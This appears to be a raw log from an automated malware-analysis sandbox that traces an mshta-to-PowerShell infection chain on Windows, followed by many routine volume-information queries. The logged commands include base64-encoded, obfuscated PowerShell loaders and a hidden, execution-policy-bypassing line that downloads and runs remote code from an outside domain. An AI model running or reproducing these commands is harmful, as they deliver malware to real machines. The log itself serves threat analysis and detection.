        Source: C:\Windows\System32\mshta.exeProcess created: Base64 decoded $nMq5LiObPXHWFHldk9PS1OGyR43IcwrXZdOMbFNKTQ = $fALsE$zFQPaqsw6zu2eh5JcNHZhlyocZhWZ1jk4bKQctkmaXilCz2psLLjLzuckbTtyEEVrHym2chEBuQ7cydN = $TRUe$kMIbwIS8Tq3660kan2CYFMcdWeNBW1wYVuzoCbZ66yrnWeuw9MDIwDgeSKd5pY1GYiHWgEWLyQR8d2Jo7TkMQcM3k3oER7hsZNNs8O3NCb3APNj4MlFSelwMtSizBXiQpPcVkxtHQYCUCW2SIwHPGlYpKtuGdJcKaX666ngrS86DvEDg0eDGsqRHxdgm6NEqOkc6G7GDQDFvupBGqv4j5ElpyPv0qcN7Z5guweLDUuUrPql = $nULL$mdAMYmUEbbpxBWYAasZmNSW7OLJArePHXHTTQ5s6MqqnwwE0peWGeZMoNtJ3FR7SxuYcqsdjsbbmkixPzgfjSnJ9AFWEYKLEYYrLBCedX4dKnIZFwwbhADVsMObluX8RYEIaLOqMCPHwDuYxTO4t2HmlzFycMmH18cGzJZgI5sxSnyef6nyptKev5AX5RwB4dkqEIMfQW3tGCRVMOpE4GtiAymB6f3cdr7BMQPGimYbdRmPV5ARYhbSg7zoKTtNgIIEIHncZV204sNURdbN9cWWQKuMpjqmhymGcQw0C7uuTQrG01Ff2Xz ="Defla" + "teStream";$d1OBxL17U144VQli9d9QOL75zT03xHILbkzdg9X5AXcE1x0Pu8UQ9TbmEV9bTaXFcO82xU7lwnVSsQ2s8EhdgDiZkO7Sgz0ORNzSsZ7AjBTZId8bQ8B5Q6OsRle6dHQkZpLyqrpiuMmXQRWYFl8EolIWQt5pgMj6YupRcD9x6SMX1sZ3T5nF9z6uLlcJ9GEiTZ9aTL8f5qbYLgj2Ryn9ijNtnxTrmsQcqg1VZkPhVhd5worNvn25fXXOaSw1jWGAkjd4LzwOnldpjDd1KShXd7oSY7NPxyULs7gF9eqcSOn92fcfIQyFzKewaHrxIQofODeLbYCtqLisaFMcQzCltkdm3R9MOpl = "Compre" + "ssion"; $1psJbjhOhuL6VmxZBo3NEB9tYRkTeLkMUI4dj06lmRLFJ7NLmbHI6QSP2g520PuNhCkeLd48PwTUlARm8N2SeaiVXfd2JjauwWjW34suQavdDbREc1aN6tVi8XvH2wbNGO15GZK32q6kL1ZOaQcCMkUeg8jsgjyzoZFFFpzRyIxxFuaDwBu1gQtOrhVXeL9nKiMYWHFPYWQDi7XUojHckscvdTSkWORLXQsnLHhq1rBnmBDqyhtKPkF0MBhIUB4zlkMHTSDVLCOy56Xm6g6ZsmXAsz4VpMW31NGoSkR9qsQeJyRv4JR3NQbcJMXhiaR5izxkw4LXSyH97epHdRHHh5C2hxrrnBY5lIbjdL4doY0u9hGguYw6bYmjTMxzFDg5nP8A
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc JABuAE0AcQA1AEwAaQBPAGIAUABYAEgAVwBGAEgAbABkAGsAOQBQAFMAMQBPAEcAeQBSADQAMwBJAGMAdwByAFgAWgBkAE8ATQBiAEYATgBLAFQAUQAgAD0AIAAkAGYAQQBMAHMARQANAAoAJAB6AEYAUQBQAGEAcQBzAHcANgB6AHUAMgBlAGgANQBKAGMATgBIAFoAaABsAHkAbwBjAFoAaABXAFoAMQBqAGsANABiAEsAUQBjAHQAawBtAGEAWABpAGwAQwB6ADIAcABzAEwATABqAEwAegB1AGMAawBiAFQAdAB5AEUARQBWAHIASAB5AG0AMgBjAGgARQBCAHUAUQA3AGMAeQBkAE4AIAA9ACAAJABUAFIAVQBlAA0ACgAkAGsATQBJAGIAdwBJAFMAOABUAHEAMwA2ADYAMABrAGEAbgAyAEMAWQBGAE0AYwBkAFcAZQBOAEIAVwAxAHcAWQBWAHUAegBvAEMAYgBaADYANgB5AHIAbgBXAGUAdQB3ADkATQBEAEkAdwBEAGcAZQBTAEsAZAA1AHAAWQAxAEcAWQBpAEgAVwBnAEUAVwBMAHkAUQBSADgAZAAyAEoAbwA3AFQAawBNAFEAYwBNADMAawAzAG8ARQBSADcAaABzAFoATgBOAHMAOABPADMATgBDAGIAMwBBAFAATgBqADQATQBsAEYAUwBlAGwAdwBNAHQAUwBpAHoAQgBYAGkAUQBwAFAAYwBWAGsAeAB0AEgAUQBZAEMAVQBDAFcAMgBTAEkAdwBIAFAARwBsAFkAcABLAHQAdQBHAGQASgBjAEsAYQBYADYANgA2AG4AZwByAFMAOAA2AEQAdgBFAEQAZwAwAGUARABHAHMAcQBSAEgAeABkAGcAbQA2AE4ARQBxAE8AawBjADYARwA3AEcARABRAEQARgB2AHUAcABCAEcAcQB2ADQAagA1AEUAbABwAHkAUAB2ADAAcQBjAE4ANwBaADUAZwB1AHcAZQBMAEQAVQB1AFUAcgBQAHEAbAAgAD0AIAAkAG4AVQBMAEwADQAKACQAbQBkAEEATQBZAG0AVQBFAGIAYgBwAHgAQgBXAFkAQQBhAHMAWgBtAE4AUwBXADcATwBMAEoAQQByAGUAUABIAFgASABUAFQAUQA1AHMANgBNAHEAcQBuAHcAdwBFADAAcABlAFcARwBlAFoATQBvAE4AdABKADMARgBSADcAUwB4AHUAWQBjAHEAcwBkAGoAcwBiAGIAbQBrAGkAeABQAHoAZwBmAGoAUwBuAEoAOQBBAEYAVwBFAFkASwBMAEUAWQBZAHIATABCAEMAZQBkAFgANABkAEsAbgBJAFoARgB3AHcAYgBoAEEARABWAHMATQBPAGIAbAB1AFgAOABSAFkARQBJAGEATABPAHEATQBDAFAASAB3AEQAdQBZAHgAVABPADQAdAAyAEgAbQBsAHoARgB5AGMATQBtAEgAMQA4AGMARwB6AEoAWgBnAEkANQBzAHgAUwBuAHkAZQBmADYAbgB5AHAAdABLAGUAdgA1AEEAWAA1AFIAdwBCADQAZABrAHEARQBJAE0AZgBRAFcAMwB0AEcAQwBSAFYATQBPAHAARQA0AEcAdABpAEEAeQBtAEIANgBmADMAYwBkAHIANwBCAE0AUQBQAEcAaQBtAFkAYgBkAFIAbQBQAFYANQBBAFIAWQBoAGIAUwBnADcAegBvAEsAVAB0AE4AZwBJAEkARQBJAEgAbgBjAFoAVgAyADAANABzAE4AVQBSAGQAYgBOADkAYwBXAFcAUQBLAHUATQBwAGoAcQBtAGgAeQBtAEcAYwBRAHcAMABDADcAdQB1AFQAUQByAEcAMAAxAEYAZgAyAFgAegAgAD0AIgBEAGUAZgBsAGEAIgAgACsAIAAiAHQAZQBTAHQAcgBlAGEAbQAiADsAJABkADEATwBCAHgATAAxADcAVQAxADQANABWAFEAbABpADkAZAA5AFEATwBMADcANQB6AFQAMAAzAHgASABJAEwAYgBrAHoAZABnADkAWAA1AEEAWABjAEUAMQB4ADAAUAB1ADgAVQBRADkAVABiAG0ARQBWADkAYgBUAGEAWABGAGMATwA4ADIAeABVADcAbAB3AG4AVgBTAHMAUQAyAHMAOABFAGgAZABnAEQAaQBaAGsATwA3AFMAZwB6ADAATwBSAE4AegBTAHMAWgA3AEEAagBCAFQAWgBJAGQAOABiAFEAOABCADUAUQA2AE8AcwBSAGwAZQA2AGQASABRAGsAWgBwAEwAeQBxAHIAcABpAHUATQBtAFgAUQBSAFcAWQBGAGwAOABFAG8AbABJAFcAUQB0ADUAcABnAE0AagA2AFkAdQBwAFIAYwBEADkAeAA2AFMATQBYADEAcwBaADMAVAA1AG4ARgA5AHoANgB1AEwAbABjAEoAOQBHAEUAaQBUAFoAOQBhAFQATAA4AGYANQBxAGIAWQBMAGcAagAyAFIAeQBuADkAaQBqAE4AdABuAHgAVAByAG0AcwBRAGMAcQBnADEAVgBaAGsAUABoAFYAaABkADUAdwBvAHIATgB2AG4AMgA1AGYAWABYAE8AYQBTAHcAMQBqAFcARwBBAGsAagBkADQATAB6AHcATwBuAGwAZABwAGoARABkADEASwBTAGgAWABkADcAbwBTAFkANwBOAFAAeAB5AFUATABzADcAZwBGADkAZQBxAGMAUwBPAG4AOQAyAGYAYwBmAEkAUQB5AEYAegBLAGUAdwBhAEgAcgB4AEkAUQBvAGYATwBEAGUATABiAFkAQwB0AHEATABpAHMAYQBGAE0AYwBRAHoAQwBsAHQAawBkAG0AMwBSADkA
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://e1.foiloverturnarrival.shop/app_permissions.json'))"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe"
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -enc jabuae0acqa1aewaaqbpagiauabyaegavwbgaegababkagsaoqbqafmamqbpaecaeqbsadqamwbjagmadwbyafgawgbkae8atqbiaeyatgblafqauqagad0aiaakagyaqqbmahmarqanaaoajab6aeyauqbqageacqbzahcangb6ahuamgblagganqbkagmatgbiafoaaabsahkabwbjafoaaabxafoamqbqagsanabiaesauqbjahqaawbtageawabpagwaqwb6adiacabzaewatabqaewaegb1agmaawbiafqadab5aeuarqbwahiasab5ag0amgbjaggarqbcahuauqa3agmaeqbkae4aiaa9acaajabuafiavqblaa0acgakagsatqbjagiadwbjafmaoabuaheamwa2adyamabrageabgayaemawqbgae0aywbkafcazqboaeiavwaxahcawqbwahuaegbvaemaygbaadyangb5ahiabgbxaguadqb3adkatqbeaekadwbeagcazqbtaesazaa1ahaawqaxaecawqbpaegavwbnaeuavwbmahkauqbsadgazaayaeoabwa3afqaawbnafeaywbnadmaawazag8arqbsadcaaabzafoatgboahmaoabpadmatgbdagiamwbbafaatgbqadqatqbsaeyauwblagwadwbnahqauwbpahoaqgbyagkauqbwafaaywbwagsaeab0aegauqbzaemavqbdafcamgbtaekadwbiafaarwbsafkacablahqadqbhagqasgbjaesayqbyadyanga2ag4azwbyafmaoaa2aeqadgbfaeqazwawaguarabhahmacqbsaegaeabkagcabqa2ae4arqbxae8aawbjadyarwa3aecarabraeqargb2ahuacabcaecacqb2adqaaga1aeuababwahkauab2adaacqbjae4anwbaaduazwb1ahcazqbmaeqavqb1afuacgbqaheabaagad0aiaakag4avqbmaewadqakacqabqbkaeeatqbzag0avqbfagiaygbwahgaqgbxafkaqqbhahmawgbtae4auwbxadcatwbmaeoaqqbyaguauabiafgasabuafqauqa1ahmangbnaheacqbuahcadwbfadaacablafcarwblafoatqbvae4adabkadmargbsadcauwb4ahuawqbjaheacwbkagoacwbiagiabqbragkaeabqahoazwbmagoauwbuaeoaoqbbaeyavwbfafkaswbmaeuawqbzahiatabcaemazqbkafganabkaesabgbjafoargb3ahcaygboaeearabwahmatqbpagiabab1afgaoabsafkarqbjageatabpaheatqbdafaasab3aeqadqbzahgavabpadqadaayaegabqbsahoargb5agmatqbtaegamqa4agmarwb6aeoawgbnaekanqbzahgauwbuahkazqbmadyabgb5ahaadablaguadga1aeeawaa1afiadwbcadqazabrahearqbjae0azgbrafcamwb0aecaqwbsafyatqbpahaarqa0aecadabpaeeaeqbtaeiangbmadmaywbkahianwbcae0auqbqaecaaqbtafkaygbkafiabqbqafyanqbbafiawqboagiauwbnadcaegbvaesavab0ae4azwbjaekarqbjaegabgbjafoavgayadaanabzae4avqbsagqaygboadkaywbxafcauqblahuatqbwagoacqbtaggaeqbtaecaywbrahcamabdadcadqb1afqauqbyaecamaaxaeyazgayafgaegagad0aigbeaguazgbsageaigagacsaiaaiahqazqbtahqacgblageabqaiadsajabkadeatwbcahgataaxadcavqaxadqanabwafeababpadkazaa5afeatwbmadcanqb6afqamaazahgasabjaewaygbrahoazabnadkawaa1aeeawabjaeuamqb4adaauab1adgavqbradkavabiag0arqbwadkaygbuageawabgagmatwa4adiaeabvadcabab3ag4avgbtahmauqayahmaoabfaggazabnaeqaaqbaagsatwa3afmazwb6adaatwbsae4aegbtahmawga3aeeaagbcafqawgbjagqaoabiafeaoabcaduauqa2ae8acwbsagwazqa2agqasabragsawgbwaewaeqbxahiacabpahuatqbtafgauqbsafcawqbgagwaoabfag8ababjafcauqb0aduacabnae0aaga2afkadqbwafiaywbeadkaeaa2afmatqbyadeacwbaadmavaa1ag4arga5ahoangb1aewababjaeoaoqbhaeuaaqbuafoaoqbhafqataa4agyanqbxagiawqbmagcaagayafiaeqbuadkaaqbqae4adabuahgavabyag0acwbragmacqbnadeavgbaagsauaboafyaaabkaduadwbvahiatgb2ag4amga1agyawabyae8ayqbtahcamqbqafcarwbbagsaagbkadqatab6ahcatwbuagwazabwagoarabkadeaswbtaggawabkadcabwbtafkanwboafaaeab5afuatabzadcazwbgadkazqbxagmauwbpag4aoqayagyaywbmaekauqb5aeyaegblaguadwbhaegacgb4aekauqbvagyatwbeaguatabiafkaqwb0aheatabpahmayqbgae0aywbrahoaqwbsahqaawbkag0amwbsadka
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -enc jabuae0acqa1aewaaqbpagiauabyaegavwbgaegababkagsaoqbqafmamqbpaecaeqbsadqamwbjagmadwbyafgawgbkae8atqbiaeyatgblafqauqagad0aiaakagyaqqbmahmarqanaaoajab6aeyauqbqageacqbzahcangb6ahuamgblagganqbkagmatgbiafoaaabsahkabwbjafoaaabxafoamqbqagsanabiaesauqbjahqaawbtageawabpagwaqwb6adiacabzaewatabqaewaegb1agmaawbiafqadab5aeuarqbwahiasab5ag0amgbjaggarqbcahuauqa3agmaeqbkae4aiaa9acaajabuafiavqblaa0acgakagsatqbjagiadwbjafmaoabuaheamwa2adyamabrageabgayaemawqbgae0aywbkafcazqboaeiavwaxahcawqbwahuaegbvaemaygbaadyangb5ahiabgbxaguadqb3adkatqbeaekadwbeagcazqbtaesazaa1ahaawqaxaecawqbpaegavwbnaeuavwbmahkauqbsadgazaayaeoabwa3afqaawbnafeaywbnadmaawazag8arqbsadcaaabzafoatgboahmaoabpadmatgbdagiamwbbafaatgbqadqatqbsaeyauwblagwadwbnahqauwbpahoaqgbyagkauqbwafaaywbwagsaeab0aegauqbzaemavqbdafcamgbtaekadwbiafaarwbsafkacablahqadqbhagqasgbjaesayqbyadyanga2ag4azwbyafmaoaa2aeqadgbfaeqazwawaguarabhahmacqbsaegaeabkagcabqa2ae4arqbxae8aawbjadyarwa3aecarabraeqargb2ahuacabcaecacqb2adqaaga1aeuababwahkauab2adaacqbjae4anwbaaduazwb1ahcazqbmaeqavqb1afuacgbqaheabaagad0aiaakag4avqbmaewadqakacqabqbkaeeatqbzag0avqbfagiaygbwahgaqgbxafkaqqbhahmawgbtae4auwbxadcatwbmaeoaqqbyaguauabiafgasabuafqauqa1ahmangbnaheacqbuahcadwbfadaacablafcarwblafoatqbvae4adabkadmargbsadcauwb4ahuawqbjaheacwbkagoacwbiagiabqbragkaeabqahoazwbmagoauwbuaeoaoqbbaeyavwbfafkaswbmaeuawqbzahiatabcaemazqbkafganabkaesabgbjafoargb3ahcaygboaeearabwahmatqbpagiabab1afgaoabsafkarqbjageatabpaheatqbdafaasab3aeqadqbzahgavabpadqadaayaegabqbsahoargb5agmatqbtaegamqa4agmarwb6aeoawgbnaekanqbzahgauwbuahkazqbmadyabgb5ahaadablaguadga1aeeawaa1afiadwbcadqazabrahearqbjae0azgbrafcamwb0aecaqwbsafyatqbpahaarqa0aecadabpaeeaeqbtaeiangbmadmaywbkahianwbcae0auqbqaecaaqbtafkaygbkafiabqbqafyanqbbafiawqboagiauwbnadcaegbvaesavab0ae4azwbjaekarqbjaegabgbjafoavgayadaanabzae4avqbsagqaygboadkaywbxafcauqblahuatqbwagoacqbtaggaeqbtaecaywbrahcamabdadcadqb1afqauqbyaecamaaxaeyazgayafgaegagad0aigbeaguazgbsageaigagacsaiaaiahqazqbtahqacgblageabqaiadsajabkadeatwbcahgataaxadcavqaxadqanabwafeababpadkazaa5afeatwbmadcanqb6afqamaazahgasabjaewaygbrahoazabnadkawaa1aeeawabjaeuamqb4adaauab1adgavqbradkavabiag0arqbwadkaygbuageawabgagmatwa4adiaeabvadcabab3ag4avgbtahmauqayahmaoabfaggazabnaeqaaqbaagsatwa3afmazwb6adaatwbsae4aegbtahmawga3aeeaagbcafqawgbjagqaoabiafeaoabcaduauqa2ae8acwbsagwazqa2agqasabragsawgbwaewaeqbxahiacabpahuatqbtafgauqbsafcawqbgagwaoabfag8ababjafcauqb0aduacabnae0aaga2afkadqbwafiaywbeadkaeaa2afmatqbyadeacwbaadmavaa1ag4arga5ahoangb1aewababjaeoaoqbhaeuaaqbuafoaoqbhafqataa4agyanqbxagiawqbmagcaagayafiaeqbuadkaaqbqae4adabuahgavabyag0acwbragmacqbnadeavgbaagsauaboafyaaabkaduadwbvahiatgb2ag4amga1agyawabyae8ayqbtahcamqbqafcarwbbagsaagbkadqatab6ahcatwbuagwazabwagoarabkadeaswbtaggawabkadcabwbtafkanwboafaaeab5afuatabzadcazwbgadkazqbxagmauwbpag4aoqayagyaywbmaekauqb5aeyaegblaguadwbhaegacgb4aekauqbvagyatwbeaguatabiafkaqwb0aheatabpahmayqbgae0aywbrahoaqwbsahqaawbkag0amwbsadka
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
